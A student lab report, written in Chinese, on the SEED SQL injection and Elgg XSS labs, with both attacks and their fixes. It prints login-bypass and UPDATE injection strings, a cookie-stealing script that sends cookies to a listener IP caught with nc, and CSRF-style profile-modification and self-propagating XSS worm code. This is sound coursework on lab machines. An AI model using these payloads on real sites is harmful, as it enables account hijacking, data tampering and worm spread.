20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业

---

---

20232831 袁思承 2023-2024-2 《网络攻防实践》第10次作业

1.实验内容

（1）SEED SQL注入攻击与防御实验
我们已经创建了一个Web应用程序，并将其托管在 三达不溜.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

1、熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。
2、对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。
3、对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。
4、SQL对抗：修复上述SQL注入攻击漏洞。

（2）SEED XSS跨站脚本攻击实验(Elgg)
为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

1、发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。
2、弹窗显示cookie信息：将cookie信息显示。
3、窃取受害者的cookies：将cookie发送给攻击者。
4、成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。
5、修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。
6、编写XSS蠕虫。
7、对抗XSS攻击。

2.实验过程

（1）SEED SQL注入攻击与防御实验

①熟悉SQL语句

任务描述：

我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

首先，我们使用以下命令，打开Ubuntu的阿帕奇apache2服务，并进行服务的状态查看：

sudo service apache2 start
sudo service apache2 status

成功启动后，我们在终端开始学习SQL语句，浅当复习本科学习过的各种数据库内容吧：

首先，打开数据库并使用root进行登录

mysql -u root -pseedubuntu

切换到Users权限，并查看所有的数据表，可以看到有两张表，Tables_in_Users和credential表

use Users;
show tables;

分别查看这两张表里面都是什么

select * from Tables_in_Users;
select * from credential;

结果发现第一张表不存在…猜测因为是系统的数据表，导致权限不够，或者确实不存在…
而第二张表中就是一张信息表，包含ID、姓名、EID、薪资、生日等等信息。

再随便输入几条SQL语句，熟悉一下SQL：

select * from credential where Name = 'Alice';
select * from credential where ID=1;
select * from credential where ID <=3 ;

②对SELECT语句的SQL注入攻击

上述Web应用存在SQL注入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

首先，在自带的火狐浏览器中打开以下网址，这里出现了一个登录界面

http://www.seedlabsqlinjection.com/

很明显，我们刚刚查询的数据库内容中，密码明显被加密过，登录肯定会失败。让我们输入Alice账户和密码进行检验，登录不上，正常。

因此，我们需要查看源码。输入以下命令进行unsafe_home.php的源代码的查看：

vim /var/www/SQLInjection/unsafe_home.php

可以看到，密码是被哈希过的hashed_pwd，所以不知道密码的情况下，我们无法通过查询到的hashed_pwd进行登录。

因此，我们使用SQL注入攻击，实现登录。我们来分析这个登录使用的select语句

$sql = "SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password
      FROM credential
      WHERE name= '$input_uname' and Password='$hashed_pwd'";

通过这个select语句我们可以知道，我们能输入以下内容进行sql注入。’ 单引号是为了终止当前的SQL语句，#是将后续的SQL语句注释。这样我们就能在SQL语句运行至WHERE name= ‘Alice’时被终止，且不用输入后续密码，直接就能成功运行这个SQL语句。

Alice'#

登陆成功！对selecrt语句的SQL注入攻击成功。

③对UPDATE语句的SQL注入攻击

通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

点击Edit Profile，发现只能修改以下内容：

于是，使用以下命令查看unsafe_edit_backend.php文件的源代码，检查Update SQL语句的内容，可以看到内容如下：

vim /var/www/SQLInjection/unsafe_edit_backend.php

我们仿照上述实验②的做法，进行SQL注入攻击，使用以下代码进行Alice的薪资和SSN号的修改，代码如下。同样的，’ 单引号表示SQL语句的中断，#表示SQL语句后续内容的省略：

', Salary='999999' where name='Alice'; #
', SSN='20232831' where name='Alice'; #

修改结果截图如下：

薪资修改成功，成功月入百万

这里发现，SQL注入随便放在任何一个文本框都可以实现，所以只要能够成功进行SQL注入，该SQL语句是否对应图中的修改框的修改位置，已经不重要了。

修改SSN号为我的学号，成功：

对UPDATE语句的SQL注入攻击实验结束，且试验成功。

④SQL对抗

修复上述SQL注入攻击漏洞。
我们可以观察php文件的源代码，可以发现，它们对SQL语句的数据和命令的判定并没有分开，而是混在一起，而数据库无法分清楚，这段SQL语句中哪段是用用户的数据，哪段又是SQL的命令。这就造成了SQL注入的发生，因此，我们用php语言中的bind_param方法来绑定参数，并用？来代替参数，这样就能修复SQL注入攻击漏洞。

对select的修复如下，我们需要使用以下代码替换掉SQL部分的代码，或者直接在上面修改即可：

$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password 
	FROM credential 
	WHERE name= ? and Password= ?");
$sql->bind_param("ss", $input_uname, $hashed_pwd);

再次登录，发现失败，修复成功

对update的修复内容如下：

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

再次修改：

点击Save后，一直卡在空白页面，可以发现Update对数据库的修改失败

文件的修改过程：

实验成功。

（2）SEED XSS跨站脚本攻击实验(Elgg)

①发布恶意消息，显示警报窗口

任务：
在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

我们打开以下网站，并用从数据库中查询到的用户进行登录，除了Admin管理员意外，所有用户的登陆密码都是seed+用户名。
例如，Alice的密码就是seedalice，Samy的密码就是seedsamy，而Admin的密码是seedelgg。当然，用户Ted无法登录，通过Admin查询所有用户发现，他并没在这个网站注册过。

http://www.xsslabelgg.com

使用Alice账户登陆后，显示界面如下：

首先，我们点击Alice的头像下面的Edit profile

在Brief description输入以下XSS攻击代码，让系统给出警告信息。

<script> alert('xss');</script>

系统给出了警告信息：xss

②弹窗显示cookie信息

任务:将cookie信息显示。

我们将xss攻击内容改成以下内容

<script> alert(document.cookie);</script>

再次进入Alice主页，系统展示cookie信息如下：

③窃取受害者的cookies

任务：将cookie发送给攻击者。

首先，我们查看当前SeedUbuntu的IP：

查询得知，为192.168.200.3，因此，我们构造以下代码：

通过以下代码，将受害者Alice的cookies发送给攻击者Boby。代码将受害者Alice的cookie放入document.write，并发送给攻击者Boby。且端口号设置为了500，此后我们要监听这个端口，从而获取受害者的cookies

<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>

这就要求我们将以下代码放在攻击者Boby的Brief description中，然后再登录受害者Alice的账户，用Alice访问Boby。

首先，登录Boby，并用以下命令修改Brief description：

<script>document.write('<img src=http://192.168.200.3:500?c='+escape(document.cookie) + ' >');</script>

输入以下命令监听端口500，然后用Alice访问Boby后，从而获取到了cookies

nc -l 500 -v

使用Alice账户，搜索并访问Boby

成功访问Boby，且成功获取受害者Alice的cookies

实验结束。

④成为受害者的朋友

任务：
使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

首先，我们观察一下添加朋友的过程：
我们使用Alice添加Boby为好友，同时，按下F12打开浏览器的开发者工具，查看添加好友过程中发出了什么信息：

可以看到，出现了一个POST请求，我们详细分析一下这个请求：

http://www.xsslabelgg.com/action/friends/add?friend=45&__elgg_ts=1715781954&__elgg_token=FXR_Mu08DjK8eIZqjnK6sg

从图中这个request url信息可知，post的参数分别为
friend=？，__elgg_ts=？，__elgg_token=？

因此，我们可以通过以下使用js程序代码，获取这仨个参数，并通过url直接强行加好友，无需对方点击“添加好友”按钮。

<p><script type="text/javascript">window.onload = function () {
    var Ajax = null;
    var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
   var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script></p>

于是，在Alice的About me栏中添加这段代码。（注意，这里必须点击About me框右上角的edit html，才可以进行添加这段代码，否则添加不成功）

切换Samy账户，首先可以看到，我们并没有任何一个好友。

访问Alice的主页，就会发现自动添加了Alice为好友，甚至Alice自己与自己也添加了好友，这是非常离谱的操作。


使用js程序加受害者为朋友，试验成功！

⑤修改受害者的信息

任务：
使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

与第④个实验相同，这里也是修改Alice的about me，从而实现受害者被添加资料。

首先，查看修改资料的日志，根据日志，使用以下代码构造js程序

根据F12的信息，可以得知，构造js程序如下：

<script type="text/javascript">
    window.onload = function(){
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "name=" + userName + "&description=<p>hhh,20232831ysc is here!</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid)
        {
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
	}
</script>

使用Samy访问Alice，发现主页被修改

访问Alice后，主页被修改截图如下：

js程序修改受害者主页完成！

⑥编写XSS蠕虫。

任务：编写XSS蠕虫
根据上述实验的经验，编写蠕虫代码如下，这段代码实现的功能与⑤类似，也是修改受害者主页，但是能够在受害者之间传播，而不用必须访问攻击者的主页，访问了受害者的主页，你也会变成下一个受害者，具有传染性：

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>";
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
        var content= token + ts + "&name=" + userName + "&description=<p>zhe li shi 20232831ysc"+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        var samyGuid=44;
        if(elgg.session.user.guid!=samyGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }</script>

同样，将其放入Alice的About me，然后用Boby去访问Alice，用Samy访问Boby，观察感染情况：

Boby账户访问Alice后

Samy账户访问Boby后

发现传染性！蠕虫构造成功！

⑦对抗XSS攻击。

对抗XSS攻击有以下方法：

1、输入验证和 sanitization
验证用户输入：确保用户输入的验证和sanitization，以防止恶意代码被注入。
使用白名单方法：只允许特定的、可靠的输入被处理，并拒绝所有其他输入。
使用sanitizer库：使用可靠的sanitizer库来清洁和sanit化用户输入。
2、输出编码
HTML转义：使用HTML转义来防止恶意代码被执行。
使用安全的编码方案：使用安全的编码方案，例如HTML实体编码或Unicode编码。
3、内容安全策略（CSP）
定义CSP策略：定义CSP策略以指定哪些内容来源被允许在网页中执行。
使用CSP头：使用CSP头来定义策略并强制执行。
4、HTTPOnly Cookies
设置HTTPOnly标志：在Cookie中设置HTTPOnly标志，以防止JavaScript访问它们。

还有很多方法 ，这里我们用Web网页内部的HTMLawed进行对抗攻击。

HTMLawed是一个PHP库，它可以帮助防止XSS（跨站脚本攻击）攻击通过过滤和sanitizing HTML输入。

方法如下：
首先，我们登录管理员账户Admin

从Account进入Administration管理员界面


点击Plugins

点击Activate，将HTMLawed激活

激活后，重新进行XSS攻击实验，例如，这里重新进行修改受害者主页信息的XSS攻击，就会发现，XSS攻击已经失效。对抗XSS攻击成功！

即，重新让Samy访问Alice，发现无法进行主页修改。

XSS对抗成功。

3.学习中遇到的问题及解决

• 问题1：About me框添加js程序代码失败
• 问题1解决方案：需要打开About me框右上角的edit html模式，否则Visual editor模式下是无法保存js程序代码的。

4.学习感悟、思考等

通过本次实验，我学习了SQL注入、Web渗透，蠕虫病毒等等相关知识，让我明白了网络安全隐患无处不在，不仅企业需要严防数据库安全问题，我们每一位网民也需要小心访问Web页面，以防出现Web方面的XSS攻击或者被蠕虫病毒感染。

参考资料

• Chatgpt